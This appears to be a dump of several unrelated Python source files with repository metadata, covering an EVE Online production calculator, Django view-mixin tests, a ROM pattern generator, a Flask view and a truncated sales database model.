mats = mats.append({'type_id': type_id, 'type_name': emt.typeIDToName(type_id), 'quantity': quantity}, ignore_index=True)
mats = mats.groupby(['type_id', 'type_name']).sum().reset_index()
mats = mats.astype({"type_id": int, "quantity": int})
if prices:
mats = emt.add_price(mats)
return mats
def vertical_production_runs(type_id: int, quantity: int, me: int = 10, prod_type: str = 'manufacturing') -> pd.DataFrame:
"""
Calculates the blueprint/reaction runs needed for vertical manufacturing (producing as much as possible)
Args:
type_id: what item/ship to produce
quantity: how much of the item to produce
me: material efficiency of the blueprints
prod_type: what type of production ('manufacturing' or 'reaction')
Returns:
returns a dataframe with the columns 'type_id', 'type_name', 'runs'
"""
actID = {'manufacturing': 1, 'reaction': 11}
mat_runs = pd.DataFrame(columns=['type_id', 'type_name', 'runs'])
if type_id in quantities.loc[(quantities['activityID'] == actID[prod_type]) & (quantities['productTypeID'] == type_id)].values: # item can be manufactured
if prod_type == 'reaction':
bpid = productToFormula(type_id)
elif prod_type == 'manufacturing':
bpid = productToBP(type_id)
else:
raise ValueError("thats not a valid manufacturing type. options are 'reaction', 'manufacturing'")
qPerRun = quantPerRun(bpid)
runs = quantity // qPerRun
if runs > 0:
mat_runs = mat_runs.append({'type_id': type_id, 'type_name': emt.typeIDToName(type_id), 'runs': runs}, ignore_index=True)
for _, row in materials.loc[(materials['activityID'] == actID[prod_type]) & (materials['typeID'] == bpid)].iterrows():
if prod_type == 'reaction':
quant = row['quantity'] * runs
elif prod_type == 'manufacturing':
quant = me_formula(row['quantity'],me) * runs
mat_runs = mat_runs.append(
vertical_production_runs(row['materialTypeID'], quant, prod_type = prod_type))
return mat_runs.reset_index(drop=True)
def invention_probability(type_id: int, rem: int = 5, science1: int = 5, science2: int = 5,
decryptor: int = 1) -> float:
base = probabilities['probability'].loc[(probabilities['typeID'] == type_id)].iloc[0]
return base * (1 + ((rem / 40) + ((science1 + science2) / 30))) * decryptor
def me_formula(quantity: int, me: int = 0) -> int:
return max(1, math.ceil(round((quantity * ((100 - me) / 100)), 2)))
def productToFormula(type_id: int) -> int:
if type_id not in quantities['productTypeID'].loc[quantities['activityID'] == 11].values:
raise ValueError(f"{type_id} is not a reaction")
return quantities['typeID'].loc[(quantities['productTypeID'] == type_id)].iloc[0]
def formulaToProduct(type_id: int) -> int:
if type_id not in quantities['typeID'].loc[quantities['activityID'] == 11].values:
raise ValueError(f"{type_id} is not a reaction formula")
return quantities['productTypeID'].loc[(quantities['typeID'] == type_id)].iloc[0]
def T2ItemToT1BPC(type_id: int) -> int:
if type_id not in quantities['productTypeID'].loc[quantities['activityID'] == 1].values:
raise ValueError(f"{type_id} doesnt have a corresponding t1 blueprint")
t2bpc = quantities['typeID'].loc[(quantities['activityID'] == 1) & (quantities['productTypeID'] == type_id)].iloc[0]
return quantities['typeID'].loc[(quantities['activityID'] == 8) & (quantities['productTypeID'] == t2bpc)].iloc[0]
def bpToProduct(type_id: int) -> int:
if type_id not in quantities['typeID'].values:
raise ValueError(f"{type_id} is not a blueprint")
return quantities['productTypeID'].loc[(quantities['activityID'] == 1) & (quantities['typeID'] == type_id)].iloc[0]
def productToBP(type_id: int) -> int:
if type_id not in quantities.loc[(quantities['activityID'] == 1) & (quantities['productTypeID'] == type_id)].values:
raise ValueError(f"{type_id} doesnt have a corresponding blueprint")
return quantities['typeID'].loc[(quantities['activityID'] == 1) & (quantities['productTypeID'] == type_id)].iloc[0]
def quantPerRun(type_id: int) -> int:
if type_id not in quantities['typeID'].values:
raise ValueError(f"{type_id} is not a blueprint")
return quantities['quantity'].loc[(quantities['typeID'] == type_id)].iloc[0]
| 46.879227 | 162 | 0.647774 | 1,185 | 9,704 | 5.178059 | 0.141772 | 0.067471 | 0.027705 | 0.027379 | 0.814374 | 0.774935 | 0.753911 | 0.710561 | 0.701923 | 0.701923 | 0 | 0.008581 | 0.219394 | 9,704 | 206 | 163 | 47.106796 | 0.801452 | 0.176422 | 0 | 0.6 | 0 | 0 | 0.210587 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095652 | false | 0 | 0.026087 | 0.008696 | 0.217391 | 0.034783 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
feebf222d8b9b02733c5d790d35166fcbd71d121 | 158 | py | Python | skylink/__init__.py | enourbakhsh/SkyLink | 3fd7d919145344515cc9d8ede90518a234421d51 | [
"MIT"
] | null | null | null | skylink/__init__.py | enourbakhsh/SkyLink | 3fd7d919145344515cc9d8ede90518a234421d51 | [
"MIT"
] | null | null | null | skylink/__init__.py | enourbakhsh/SkyLink | 3fd7d919145344515cc9d8ede90518a234421d51 | [
"MIT"
] | null | null | null | from .skylink import *
from .fof import *
from .astropy_search.matching import *
from .graph import *
from .testing import *
from .version import __version__
| 22.571429 | 38 | 0.772152 | 21 | 158 | 5.571429 | 0.47619 | 0.42735 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151899 | 158 | 6 | 39 | 26.333333 | 0.873134 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3a1cf169dc5b49c1d6af0437b74a42f128cfa7f0 | 180 | py | Python | components/mpas-seaice/testing_and_setup/testcases/error_analysis/run_testcase.py | Fa-Li/E3SM | a91995093ec6fc0dd6e50114f3c70b5fb64de0f0 | [
"zlib-acknowledgement",
"FTL",
"RSA-MD"
] | 235 | 2018-04-23T16:30:06.000Z | 2022-03-21T17:53:12.000Z | components/mpas-seaice/testing_and_setup/testcases/error_analysis/run_testcase.py | Fa-Li/E3SM | a91995093ec6fc0dd6e50114f3c70b5fb64de0f0 | [
"zlib-acknowledgement",
"FTL",
"RSA-MD"
] | 2,372 | 2018-04-20T18:12:34.000Z | 2022-03-31T23:43:17.000Z | components/mpas-seaice/testing_and_setup/testcases/error_analysis/run_testcase.py | Fa-Li/E3SM | a91995093ec6fc0dd6e50114f3c70b5fb64de0f0 | [
"zlib-acknowledgement",
"FTL",
"RSA-MD"
] | 254 | 2018-04-20T20:43:32.000Z | 2022-03-30T20:13:38.000Z | from create_grids import create_grids
from run_model import run_model
from error_analysis_strain import error_analysis_strain
create_grids()
run_model()
error_analysis_strain()
| 18 | 55 | 0.866667 | 27 | 180 | 5.333333 | 0.333333 | 0.229167 | 0.395833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 180 | 9 | 56 | 20 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
3a2ee4faac5a4f9df5f2d9afb025be6a6815ba97 | 29 | py | Python | adou/__init__.py | dpsnewailab/adou | bea7412202cb17893347e4ff63aab0fb8399bd3b | [
"MIT"
] | null | null | null | adou/__init__.py | dpsnewailab/adou | bea7412202cb17893347e4ff63aab0fb8399bd3b | [
"MIT"
] | 13 | 2020-04-21T04:21:31.000Z | 2020-04-26T17:34:02.000Z | adou/__init__.py | dpsnewailab/adou | bea7412202cb17893347e4ff63aab0fb8399bd3b | [
"MIT"
] | null | null | null | from adou.meta.model import * | 29 | 29 | 0.793103 | 5 | 29 | 4.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 29 | 1 | 29 | 29 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
28e3d503d2dfcb365f88294e8064b5b0aa9e1c6f | 61 | py | Python | yaml_backed_structs/__init__.py | dcdanko/YamlBackedPyStructs | eda615af7be325be21395a2cc69f4e068935b246 | [
"MIT"
] | null | null | null | yaml_backed_structs/__init__.py | dcdanko/YamlBackedPyStructs | eda615af7be325be21395a2cc69f4e068935b246 | [
"MIT"
] | null | null | null | yaml_backed_structs/__init__.py | dcdanko/YamlBackedPyStructs | eda615af7be325be21395a2cc69f4e068935b246 | [
"MIT"
] | null | null | null | from .persistent_dict import *
from .persistent_set import *
| 20.333333 | 30 | 0.803279 | 8 | 61 | 5.875 | 0.625 | 0.595745 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131148 | 61 | 2 | 31 | 30.5 | 0.886792 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3a6482738038ce05a9cb33bde98e06a1d68149bd | 187 | py | Python | app/views/index.py | godfoder/settler | 7db7b09dc15100b445b519f19d7936643d03873d | [
"MIT"
] | null | null | null | app/views/index.py | godfoder/settler | 7db7b09dc15100b445b519f19d7936643d03873d | [
"MIT"
] | null | null | null | app/views/index.py | godfoder/settler | 7db7b09dc15100b445b519f19d7936643d03873d | [
"MIT"
] | null | null | null | from .. import app
from flask import render_template
from flask.ext.security import login_required
@app.route('/')
@login_required
def index():
return render_template("index.html")
| 18.7 | 45 | 0.764706 | 26 | 187 | 5.346154 | 0.576923 | 0.129496 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128342 | 187 | 9 | 46 | 20.777778 | 0.852761 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | true | 0 | 0.428571 | 0.142857 | 0.714286 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
3a69a1ee2c9e0c0f0ac674adcf1fdc0d20c94a3a | 1,712 | py | Python | ex4/serial_gen.py | hiyouga/digiC-experiment | 799156206210b9004d94a6f72c617104a99518ca | [
"MIT"
] | 4 | 2018-11-14T09:07:13.000Z | 2019-12-23T08:48:00.000Z | ex4/serial_gen.py | hiyouga/digiC-experiment | 799156206210b9004d94a6f72c617104a99518ca | [
"MIT"
] | 1 | 2019-12-08T07:58:40.000Z | 2019-12-08T11:50:54.000Z | ex4/serial_gen.py | hiyouga/digiC-experiment | 799156206210b9004d94a6f72c617104a99518ca | [
"MIT"
] | 1 | 2019-12-23T08:54:50.000Z | 2019-12-23T08:54:50.000Z | # 用python生成第四次数电实验的代码,采用奇校验
data = list(map(int, input("输入要转化的16bit的二进制,空格分隔\n").split()))
if len(data) != 16:
print("长度不满足!")
exit()
j = 0
cnt = 0
output = []
for i in range(15):
print("ROM[{:d}] <= 1'b0;".format(j))
output.append("0\n")
j+=1
for i in range(15):
print("ROM[{:d}] <= 1'b1;".format(j))
output.append("1\n")
j+=1;
for d in data:
if(d == 0):
for i in range(5):
print("ROM[{:d}] <= 1'b0;".format(j))
output.append("0\n")
j+=1
for i in range(6):
print("ROM[{:d}] <= 1'b1;".format(j))
output.append("1\n")
j+=1
else:
cnt += 1
for i in range(5):
print("ROM[{:d}] <= 1'b1;".format(j))
output.append("1\n")
j+=1
for i in range(6):
print("ROM[{:d}] <= 1'b0;".format(j))
output.append("0\n")
j+=1
if cnt % 2 == 0:
#if cnt % 2 != 0: # ERROR
for i in range(5):
print("ROM[{:d}] <= 1'b1;".format(j))
output.append("1\n")
j+=1
for i in range(5):
print("ROM[{:d}] <= 1'b0;".format(j))
output.append("0\n")
j+=1
while j < 220:
print("ROM[{:d}] <= 1'b0;".format(j))
output.append("0\n")
j+=1
else:
for i in range(5):
print("ROM[{:d}] <= 1'b0;".format(j))
output.append("0\n")
j+=1
for i in range(5):
print("ROM[{:d}] <= 1'b1;".format(j))
output.append("1\n")
j+=1
while j < 220:
print("ROM[{:d}] <= 1'b1;".format(j))
output.append("1\n")
j+=1
with open('rom.patt', 'w') as f:
f.writelines(output)
f.close()
| 23.452055 | 62 | 0.439252 | 267 | 1,712 | 2.816479 | 0.179775 | 0.12766 | 0.143617 | 0.159574 | 0.75 | 0.75 | 0.75 | 0.75 | 0.75 | 0.730053 | 0 | 0.068182 | 0.331776 | 1,712 | 72 | 63 | 23.777778 | 0.589161 | 0.028037 | 0 | 0.765625 | 0 | 0 | 0.174096 | 0.013253 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.203125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3a772a52c52d38232b282fde6dc910629442c560 | 160 | py | Python | luban/shell_entrance.py | Garen-in-bush/Fastapi_Luban | 39ea349a5c244c271b28a2e901d7f238fb44bc10 | [
"MIT"
] | 3 | 2021-04-21T03:56:53.000Z | 2021-04-23T07:24:11.000Z | luban/shell_entrance.py | Garen-in-bush/Fastapi_Luban | 39ea349a5c244c271b28a2e901d7f238fb44bc10 | [
"MIT"
] | null | null | null | luban/shell_entrance.py | Garen-in-bush/Fastapi_Luban | 39ea349a5c244c271b28a2e901d7f238fb44bc10 | [
"MIT"
] | null | null | null | from fastapi_model import FastModelTran
import sys
# TODO 预留命令行入口
def parsing_parameters(parameters):
pass
def main():
parsing_parameters(sys.argv)
| 13.333333 | 39 | 0.76875 | 20 | 160 | 6 | 0.7 | 0.283333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16875 | 160 | 11 | 40 | 14.545455 | 0.902256 | 0.075 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 0 | 1 | 0.333333 | false | 0.166667 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 6 |
3add64fa27ffaa69e5d72db676dd34efe9cc952a | 23 | py | Python | mocksurvey/httools/__init__.py | valentinalatorre/mocksurvey | 644390dbaa098161f5d53c79d41a6525fc18c840 | [
"MIT"
] | 4 | 2020-03-26T18:05:10.000Z | 2021-12-02T03:08:56.000Z | mocksurvey/httools/__init__.py | valentinalatorre/mocksurvey | 644390dbaa098161f5d53c79d41a6525fc18c840 | [
"MIT"
] | null | null | null | mocksurvey/httools/__init__.py | valentinalatorre/mocksurvey | 644390dbaa098161f5d53c79d41a6525fc18c840 | [
"MIT"
] | 1 | 2021-08-30T20:28:25.000Z | 2021-08-30T20:28:25.000Z | from .httools import *
| 11.5 | 22 | 0.73913 | 3 | 23 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 23 | 1 | 23 | 23 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
aaff1a0aeb306873788a7dc89520ab99e015d5b6 | 65 | py | Python | masonite/contrib/__init__.py | vaibhavmule/masonite-cloudinary-driver | 866b073717144b8e4755495a01cd4da20d295eaf | [
"MIT"
] | 1 | 2018-12-08T07:07:37.000Z | 2018-12-08T07:07:37.000Z | masonite/contrib/__init__.py | vaibhavmule/masonite-cloudinary-driver | 866b073717144b8e4755495a01cd4da20d295eaf | [
"MIT"
] | null | null | null | masonite/contrib/__init__.py | vaibhavmule/masonite-cloudinary-driver | 866b073717144b8e4755495a01cd4da20d295eaf | [
"MIT"
] | null | null | null | from .cloudinary import drivers
from .cloudinary import providers | 32.5 | 33 | 0.861538 | 8 | 65 | 7 | 0.625 | 0.5 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107692 | 65 | 2 | 33 | 32.5 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c961f5423a3a9d78db17a07344e23348be27e608 | 49 | py | Python | wolong/cli.py | brianthelion/wolong | 7a27a9185b7ff50d598196d06375bbb737050a6d | [
"MIT"
] | null | null | null | wolong/cli.py | brianthelion/wolong | 7a27a9185b7ff50d598196d06375bbb737050a6d | [
"MIT"
] | null | null | null | wolong/cli.py | brianthelion/wolong | 7a27a9185b7ff50d598196d06375bbb737050a6d | [
"MIT"
] | null | null | null | from plugnparse import entrypoint, ParserFactory
| 24.5 | 48 | 0.877551 | 5 | 49 | 8.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102041 | 49 | 1 | 49 | 49 | 0.977273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c9726399e9ebaf245ce8befadef59f10cdfeac1c | 7,928 | py | Python | tests/test_mixins.py | MichaelWalker/directory-components | 9dac4e9d7fd477cd272e09440f2c9b7d1ef76e1e | [
"MIT"
] | 2 | 2019-06-24T20:22:23.000Z | 2019-07-26T12:51:31.000Z | tests/test_mixins.py | MichaelWalker/directory-components | 9dac4e9d7fd477cd272e09440f2c9b7d1ef76e1e | [
"MIT"
] | 278 | 2018-02-21T11:49:46.000Z | 2021-09-16T08:27:54.000Z | tests/test_mixins.py | MichaelWalker/directory-components | 9dac4e9d7fd477cd272e09440f2c9b7d1ef76e1e | [
"MIT"
] | 3 | 2019-05-02T15:26:26.000Z | 2020-02-18T17:47:57.000Z | from unittest.mock import patch, Mock
from directory_constants.choices import COUNTRY_CHOICES
import pytest
from django.contrib.auth.models import AnonymousUser
from django.utils import translation
from django.views.generic import TemplateView
from directory_components import mixins
@pytest.mark.parametrize('country_code,country_name', COUNTRY_CHOICES)
@patch('directory_components.helpers.get_user_country')
def test_country_display_mixin(
mock_country, country_code, country_name, rf
):
class TestView(mixins.CountryDisplayMixin, TemplateView):
template_name = 'directory_components/base.html'
mock_country.return_value = country_code
request = rf.get('/')
response = TestView.as_view()(request)
assert response.context_data['hide_country_selector']
assert response.context_data['country']['name'] == country_name
assert response.context_data['country']['code'] == country_code.lower()
@patch('directory_components.helpers.get_user_country')
def test_country_display_mixin_no_country(mock_country, rf):
class TestView(mixins.CountryDisplayMixin, TemplateView):
template_name = 'directory_components/base.html'
mock_country.return_value = ''
request = rf.get('/')
response = TestView.as_view()(request)
assert not response.context_data['hide_country_selector']
assert not response.context_data['country']['name']
assert not response.context_data['country']['code']
def test_language_display_mixin(rf, settings):
class TestView(mixins.EnableTranslationsMixin, TemplateView):
template_name = 'directory_components/base.html'
# Test with usual settings first
request = rf.get('/')
request.LANGUAGE_CODE = ''
response = TestView.as_view()(request)
assert response.context_data['language_switcher']['form']
# Test when MIDDLWARE_CLASSES setting is being used instead of MIDDLEWARE
settings.MIDDLEWARE_CLASSES = settings.MIDDLEWARE
settings.MIDDLEWARE = []
request = rf.get('/')
request.LANGUAGE_CODE = ''
response = TestView.as_view()(request)
assert response.context_data['language_switcher']['form']
def test_cms_language_switcher_one_language(rf):
class MyView(mixins.CMSLanguageSwitcherMixin, TemplateView):
template_name = 'directory_components/base.html'
page = {
'meta': {'languages': [('en-gb', 'English')]}
}
request = rf.get('/')
request.LANGUAGE_CODE = ''
with translation.override('de'):
response = MyView.as_view()(request)
assert response.status_code == 200
assert response.context_data['language_switcher']['show'] is False
def test_cms_language_switcher_active_language_unavailable(rf):
class MyView(mixins.CMSLanguageSwitcherMixin, TemplateView):
template_name = 'directory_components/base.html'
page = {
'meta': {
'languages': [('en-gb', 'English'), ('de', 'German')]
}
}
request = rf.get('/')
request.LANGUAGE_CODE = 'fr'
response = MyView.as_view()(request)
assert response.status_code == 200
assert response.context_data['language_switcher']['show'] is False
def test_cms_language_switcher_active_language_available(rf):
class MyView(mixins.CMSLanguageSwitcherMixin, TemplateView):
template_name = 'directory_components/base.html'
page = {
'meta': {
'languages': [('en-gb', 'English'), ('de', 'German')]
}
}
request = rf.get('/')
request.LANGUAGE_CODE = 'de'
response = MyView.as_view()(request)
assert response.status_code == 200
context = response.context_data['language_switcher']
assert context['show'] is True
assert context['form'].initial['lang'] == 'de'
def test_ga360_mixin_for_logged_in_user_old_style(rf):
class TestView(mixins.GA360Mixin, TemplateView):
template_name = 'directory_components/base.html'
def __init__(self):
super().__init__()
self.set_ga360_payload(
page_id='TestPageId',
business_unit='Test App',
site_section='Test Section',
site_subsection='Test Page'
)
request = rf.get('/')
request.sso_user = Mock(
hashed_uuid='a9a8f733-6bbb-4dca-a682-e8a0a18439e9',
spec_set=['hashed_uuid'],
)
with translation.override('de'):
response = TestView.as_view()(request)
assert response.context_data['ga360']
ga360_data = response.context_data['ga360']
assert ga360_data['page_id'] == 'TestPageId'
assert ga360_data['business_unit'] == 'Test App'
assert ga360_data['site_section'] == 'Test Section'
assert ga360_data['site_subsection'] == 'Test Page'
assert ga360_data['user_id'] == 'a9a8f733-6bbb-4dca-a682-e8a0a18439e9'
assert ga360_data['login_status'] is True
assert ga360_data['site_language'] == 'de'
def test_ga360_mixin_for_logged_in_user(rf):
class TestView(mixins.GA360Mixin, TemplateView):
template_name = 'directory_components/base.html'
def __init__(self):
super().__init__()
self.set_ga360_payload(
page_id='TestPageId',
business_unit='Test App',
site_section='Test Section',
site_subsection='Test Page'
)
request = rf.get('/')
request.user = Mock(
id=1,
hashed_uuid='a9a8f733-6bbb-4dca-a682-e8a0a18439e9',
is_authenticated=True
)
with translation.override('de'):
response = TestView.as_view()(request)
assert response.context_data['ga360']
ga360_data = response.context_data['ga360']
assert ga360_data['page_id'] == 'TestPageId'
assert ga360_data['business_unit'] == 'Test App'
assert ga360_data['site_section'] == 'Test Section'
assert ga360_data['site_subsection'] == 'Test Page'
assert ga360_data['user_id'] == 'a9a8f733-6bbb-4dca-a682-e8a0a18439e9'
assert ga360_data['login_status'] is True
assert ga360_data['site_language'] == 'de'
def test_ga360_mixin_for_anonymous_user_old_style(rf):
class TestView(mixins.GA360Mixin, TemplateView):
template_name = 'directory_components/base.html'
def __init__(self):
super().__init__()
self.set_ga360_payload(
page_id='TestPageId',
business_unit='Test App',
site_section='Test Section',
site_subsection='Test Page'
)
request = rf.get('/')
request.sso_user = None
with translation.override('de'):
response = TestView.as_view()(request)
assert response.context_data['ga360']
ga360_data = response.context_data['ga360']
assert ga360_data['user_id'] is None
assert ga360_data['login_status'] is False
def test_ga360_mixin_for_anonymous_user(rf):
class TestView(mixins.GA360Mixin, TemplateView):
template_name = 'directory_components/base.html'
def __init__(self):
super().__init__()
self.set_ga360_payload(
page_id='TestPageId',
business_unit='Test App',
site_section='Test Section',
site_subsection='Test Page'
)
request = rf.get('/')
request.user = AnonymousUser()
with translation.override('de'):
response = TestView.as_view()(request)
assert response.context_data['ga360']
ga360_data = response.context_data['ga360']
assert ga360_data['user_id'] is None
assert ga360_data['login_status'] is False
def test_ga360_mixin_does_not_share_data_between_instances():
class TestView(mixins.GA360Mixin):
pass
view_one = TestView()
view_one.ga360_payload['Test Key'] = "Test Value"
view_two = TestView()
assert 'Test Key' not in view_two.ga360_payload
| 31.212598 | 77 | 0.6694 | 897 | 7,928 | 5.623188 | 0.152731 | 0.039255 | 0.07157 | 0.041435 | 0.813243 | 0.781324 | 0.76249 | 0.717883 | 0.717883 | 0.687946 | 0 | 0.035364 | 0.215313 | 7,928 | 253 | 78 | 31.335968 | 0.775438 | 0.012866 | 0 | 0.661202 | 0 | 0 | 0.177298 | 0.076825 | 0 | 0 | 0 | 0 | 0.20765 | 1 | 0.081967 | false | 0.005464 | 0.038251 | 0 | 0.251366 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a30bff55e8de2d484dc740f7cf8472d7fc4b22a5 | 165 | py | Python | Face-Mask-Detection-Algorithm/URLopen.py | BhendiBoi/ESP32-FMTSS | a452f8f6a5e4eca0ea92a0f33d30066e8903d57b | [
"MIT"
] | 1 | 2021-08-04T06:15:45.000Z | 2021-08-04T06:15:45.000Z | Face-Mask-Detection-Algorithm/URLopen.py | BhendiBoi/ESP32-FMTSS | a452f8f6a5e4eca0ea92a0f33d30066e8903d57b | [
"MIT"
] | null | null | null | Face-Mask-Detection-Algorithm/URLopen.py | BhendiBoi/ESP32-FMTSS | a452f8f6a5e4eca0ea92a0f33d30066e8903d57b | [
"MIT"
] | null | null | null | import urllib.request
if mask_detected:
urllib.request.urlopen('http://192.168.43.136/mask')
else:
urllib.request.urlopen('http://192.168.43.136/nomask')
| 23.571429 | 57 | 0.715152 | 25 | 165 | 4.68 | 0.56 | 0.333333 | 0.34188 | 0.410256 | 0.598291 | 0.598291 | 0.598291 | 0.598291 | 0 | 0 | 0 | 0.14966 | 0.109091 | 165 | 6 | 58 | 27.5 | 0.646259 | 0 | 0 | 0 | 0 | 0 | 0.339623 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a35cd2bc669818359054a4556d9b44f05eac5f29 | 2,409 | py | Python | models/BillDetail.py | mynamezxc/wxPython-saler-small-example | 91bf47f2f38d11f211ce3a00fa3b80f3cd5a4837 | [
"MIT"
] | 2 | 2020-02-08T07:12:09.000Z | 2020-11-07T13:30:16.000Z | models/BillDetail.py | mynamezxc/wxPython-sales-small-example | 91bf47f2f38d11f211ce3a00fa3b80f3cd5a4837 | [
"MIT"
] | null | null | null | models/BillDetail.py | mynamezxc/wxPython-sales-small-example | 91bf47f2f38d11f211ce3a00fa3b80f3cd5a4837 | [
"MIT"
] | null | null | null | from models.database import *
class BillModelct(Database):
def DanhSach(self):
chuoiSQL = "select ID, product_id,unit_id,product_nameHOA,unit_code,amount,unit_price,sub_total,tax,tax_amount,note,bill_id from bill_detail"
cursor = Database.getALL(self,chuoiSQL)
if cursor != None:
recordList = []
for row in cursor:
TT = {'ID':row[0], 'product_id':row[1],'unit_id':row[2],'product_nameHOA':row[3],'unit_code':row[4],'amount':row[5],'unit_price':row[6],'sub_total':row[7],'tax':row[8],'tax_amount':row[9],'note':row[10],',bill_id':row[11]}
recordList.append(TT)
return recordList
def GetDetailPX(self, ID_PX):
